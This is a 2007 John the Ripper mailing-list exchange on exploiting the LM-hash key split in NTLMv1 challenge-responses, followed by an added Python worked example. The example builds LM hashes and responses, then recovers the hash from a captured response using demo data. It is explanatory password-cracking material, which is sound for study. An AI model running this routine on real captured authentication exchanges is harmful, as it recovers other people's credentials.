Date: Tue, 13 Nov 2007 21:12:09 -0600
From: jmk <jmk@...fus.net>
To: john-users@...ts.openwall.com
Subject: Re: advice requested about NTLMv1 implementation

On Tue, 2007-11-13 at 09:54 +0100, Simon Marechal wrote:
> Hello,
>
> as most people know it's quite easy once you have a valid account on a
> Windows computer (not Vista) to retrieve an NTLMv1 response to an
> arbitrary challenge. This makes it quite useful when looking for a valid
> user password.
>
> This response is made of 3 chunks, based on the LM hash (which is made
> of 2 chunks). The dependency is:
>
> C/R          LM
> 1st chunk    7 first bytes of the first LM chunk
> 2nd chunk    last byte of 1st LM chunk and 6 first bytes of 2nd chunk
> 3rd chunk    2 last bytes of the second LM chunk
>
> It should be clear here that there are only 2^16 3rd chunks for a given
> challenge. Getting the last 2 bytes of the 2nd chunk's LM hash is thus
> quite fast. In the same way, once you know the 2nd LM chunk, it's quite
> easy to retrieve the last byte of the 1st.
>
> It thus makes sense to only compute the LM hash, and do the full
> computation on passwords whose last bytes match (with a false positive
> rate of 1/2^16 and 1/2^8 for the 2nd and 1st chunk).
>
> It's straightforward to alter the LM cipher to crack either the last
> chunk or the first chunk, but I can't see a smart way to attack both in
> the same cipher, as the split() function would retrieve chunks that are
> computed differently. Would someone have good advice on that?

I don't have any good advice for you on this specifically. ;)

At the risk of pointing out the obvious, have you seen the basic
implementation of LMv1/NTLMv1 posted here:

http://openwall.com/john/contrib/john-18.104.22.168-netlm-netntlm-jmk-3.diff.gz
http://openwall.com/john/contrib/john-1.7.2-all-8.diff.gz

I've found coupling LMv1 (1st chunk) Rainbow Table look-ups with NTLMv1
brute-force guessing to be relatively quick for cracking a user's
password.
Joe
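The chunk dependency Simon lays out in the quoted message, and the filtering approach he proposes, as an added worked example. This is not code from the john-users thread or from John the Ripper. Assumptions: pycryptodome's Crypto.Cipher.DES is used when it is installed, in which case the outputs are genuine LM hashes and LMv1 responses; otherwise a keyed HMAC-SHA256 stand-in with the same 7-byte-key / 8-byte-block shape replaces DES so the structural attack still runs offline (the values are then not real NTLMv1). The challenge and the small candidate list are constructed for the demo.

```python
"""LMv1/NTLMv1 response construction and the key-split weakness from the
thread above.  Added example; not code from john-users or John the Ripper.

Real DES comes from pycryptodome when installed (outputs are then genuine
LM hashes and LMv1 responses).  Without it, a keyed HMAC-SHA256 stand-in
with the same 7-byte-key / 8-byte-block shape is substituted so the
structural attack still runs offline; values are then not real NTLMv1.
"""
import hashlib
import hmac

try:
    from Crypto.Cipher import DES  # pycryptodome, optional
    HAVE_DES = True
except ImportError:
    HAVE_DES = False

LM_MAGIC = b"KGS!@#$%"  # constant the LM hash encrypts


def des_key_from_7(k7: bytes) -> bytes:
    """Expand 7 key bytes to DES's 8-byte form: 7 key bits per byte with an
    odd-parity bit in the low position (the expansion LM/NTLMv1 use)."""
    n = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        seven = (n >> (49 - 7 * i)) & 0x7F
        out.append((seven << 1) | ((bin(seven).count("1") + 1) & 1))
    return bytes(out)


def des_block(k7: bytes, block: bytes) -> bytes:
    """Encrypt one 8-byte block under a 7-byte key."""
    if HAVE_DES:
        return DES.new(des_key_from_7(k7), DES.MODE_ECB).encrypt(block)
    return hmac.new(k7, block, hashlib.sha256).digest()[:8]  # stand-in, not DES


def lm_half(text: str) -> bytes:
    """Normalise up to 7 password characters into one LM half-key."""
    return text.upper().encode("latin-1")[:7].ljust(7, b"\x00")


def lm_hash(password: str) -> bytes:
    """LM hash: two independent halves, each DES_k(LM_MAGIC) under 7 chars."""
    p = password.upper().encode("latin-1")[:14].ljust(14, b"\x00")
    return des_block(p[:7], LM_MAGIC) + des_block(p[7:], LM_MAGIC)


def lm_response(lm: bytes, challenge: bytes) -> bytes:
    """Pad the 16-byte hash with 5 zero bytes to 21, split into three 7-byte
    DES keys and encrypt the 8-byte challenge under each:
    key1 = hash[0:7], key2 = hash[7:14], key3 = hash[14:16] + 5 zero bytes.
    (NTLMv1 proper is the same construction over the NT hash.)"""
    k = lm + b"\x00" * 5
    return b"".join(des_block(k[i:i + 7], challenge) for i in (0, 7, 14))


def recover_tail(response: bytes, challenge: bytes) -> bytes:
    """Chunk 3 depends on hash[14:16] only: at most 2^16 trial encryptions."""
    target = response[16:24]
    for v in range(1 << 16):
        tail = v.to_bytes(2, "big")
        if des_block(tail + b"\x00" * 5, challenge) == target:
            return tail
    raise ValueError("chunk 3 matches no 2-byte tail")


def recover_byte7(response: bytes, challenge: bytes, hash_8_13: bytes) -> int:
    """Chunk 2's key is hash[7] + hash[8:14]; with the second LM half known,
    the last byte of the first half is at most 2^8 trial encryptions."""
    for b in range(256):
        if des_block(bytes([b]) + hash_8_13, challenge) == response[8:16]:
            return b
    raise ValueError("chunk 2 matches no byte for this second half")


def crack_lm_from_response(response, challenge, half_candidates):
    """Simon's filtering idea: compute only the one-DES LM half per candidate
    and spend the full check on candidates whose cheap bytes match.
    Stage 1: second half, filtered on hash[14:16] (2^-16 false positives),
    confirmed by the byte-7 search over chunk 2.
    Stage 2: first half, filtered on hash[7] (2^-8), confirmed by chunk 1.
    Returns the full 16-byte LM hash or None."""
    tail = recover_tail(response, challenge)
    second = byte7 = None
    for cand in half_candidates:
        h2 = des_block(cand, LM_MAGIC)
        if h2[6:8] != tail:
            continue
        try:
            byte7 = recover_byte7(response, challenge, h2[:6])
        except ValueError:
            continue  # tail collision, wrong second half
        second = h2
        break
    if second is None:
        return None
    for cand in half_candidates:
        h1 = des_block(cand, LM_MAGIC)
        if h1[7] == byte7 and des_block(h1[:7], challenge) == response[:8]:
            return h1 + second
    return None


# Constructed demo data: a fixed challenge and a small candidate list in which
# the two halves of "Password" ("PASSWOR" and "D") sit among decoys.
CHALLENGE = bytes.fromhex("0123456789abcdef")
CANDIDATES = [lm_half(w) for w in ("admin", "letmein", "d", "secret", "passwor")]

if __name__ == "__main__":
    target = lm_response(lm_hash("Password"), CHALLENGE)
    print("backend :", "DES" if HAVE_DES else "stand-in PRF")
    print("response:", target.hex())
    print("tail    :", recover_tail(target, CHALLENGE).hex())
    print("LM hash :", crack_lm_from_response(target, CHALLENGE, CANDIDATES).hex())
```

The point to take from the two search loops is the cost asymmetry: chunk 3 gives away two hash bytes for 2^16 work regardless of the password, and once the second LM half is known, chunk 2 gives away the seventh byte for 2^8 work, so a cracker only needs the cheap one-DES LM half per candidate before deciding whether the full three-DES response is worth computing.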